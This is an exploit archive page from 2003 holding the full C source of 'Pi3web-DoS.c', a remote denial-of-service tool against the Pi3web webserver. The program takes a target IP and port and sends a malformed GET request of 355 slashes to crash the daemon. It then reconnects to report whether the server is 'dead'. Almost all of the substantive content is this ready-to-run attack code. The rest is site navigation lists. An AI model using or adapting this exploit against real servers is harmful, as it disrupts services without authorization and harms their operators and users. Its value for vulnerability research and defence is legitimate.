Pi3web-DoS.c

Pi3web-DoS.c: Posted May 23, 2003; Authored by Angelo Rosiello, rosiello | Site rosiello.org; A simple denial of service exists in the Pi3 webserver that allows a remote attacker to crash the daemon by feeding it a GET request with 354+ forward slashes after it.; tags | exploit, remote, denial of service; SHA-256 | d0d216a28eaf4658a4d2b9ad6dbe5182010977d617055973a17d6620ae03dea4; Download | Favorite | View

Pi3web-DoS.c

/* 
 * Rosiello Security
 *
 * http://www.rosiello.org
 * http://dtors.net
 * 
 * Unix Version of the Pi3web DoS.
 * ----------------------------------------------------------
 * Info: Pi3Web Server is vulnerable to a denial of Service.
 * ----------------------------------------------------------
 * VULNERABILITY:
 * GET //// <- 354
 * 
 * The bug was found by aT4r@3wdesign.es  04/26/2003
 * www.3wdesign.es Security
 * ----------------------------------------------------------
 * Unix Version Credits.
 * AUTHOR : Angelo Rosiello
 * CONTACT: angelo@rosiello.org, angelo@dtors.net
 *       
*/

#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <string.h>
#include <assert.h>

void addr_initialize();

int main(int argc, char **argv)
{
  int i, port, sd, rc;
  char buffer[355];
  char *get = "GET";
  char packet[360];
  struct sockaddr_in server;

  if(argc > 3 || argc < 2)
  {  
    printf("USAGE: %s IP PORT\n", argv[0]);
    printf("e.g. ./pi3web-DoS 127.0.0.1 80\n");
    exit(0);
  }
  if(argc == 2) port = 80;
  else port = atoi(argv[2]);
  
  for(i = 0; i < 355; i++) buffer[i] = '/';    //Build the malformed request
  sprintf(packet, "%s %s\n", get, buffer);
  addr_initialize(&server, port, (long)inet_addr(argv[1]));
  
  sd = socket(AF_INET, SOCK_STREAM, 0);
  if(sd < 0) perror("Socket");
  assert(sd >= 0);
  rc = connect(sd, (struct sockaddr *) &server, sizeof(server));   
  if(rc != 0) perror("Connect");
  assert(rc == 0);
  printf("\n\t\t(c) 2003 DTORS Security\n");
  printf("\t\tUnix Version DoS for Pi3web\n");
  printf("\t\tby Angelo Rosiello\n\n");
  write(sd, packet, strlen(packet));      //Caput!
  printf("Malformed packet sent!\n");
  close(sd);

  printf("Checking if the server crashed...\n");
  sleep(3);

  sd = socket(AF_INET, SOCK_STREAM, 0);
        if(sd < 0) perror("Socket");
  assert(sd >= 0);
  rc = connect(sd, (struct sockaddr *) &server, sizeof(server));
  if(rc != 0)
  {  
    printf("The server is dead!\n");
    exit(0);
  }
  else if(rc == 0) printf("The server is not vulnerable!\n");
  close(sd);
  exit(0);
}

void addr_initialize (struct sockaddr_in *address, int port, long IPaddr)
{
        address -> sin_family = AF_INET;
        address -> sin_port = htons((u_short)port);
        address -> sin_addr.s_addr = IPaddr;
}

/*EOF*/

Top Authors In Last 30 Days

Red Hat 221 files
Ubuntu 59 files
Debian 30 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,298)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,550)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,453)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Pi3web-DoS.c

Pi3web-DoS.c

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Pi3web-DoS.c

Share This

Pi3web-DoS.c

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems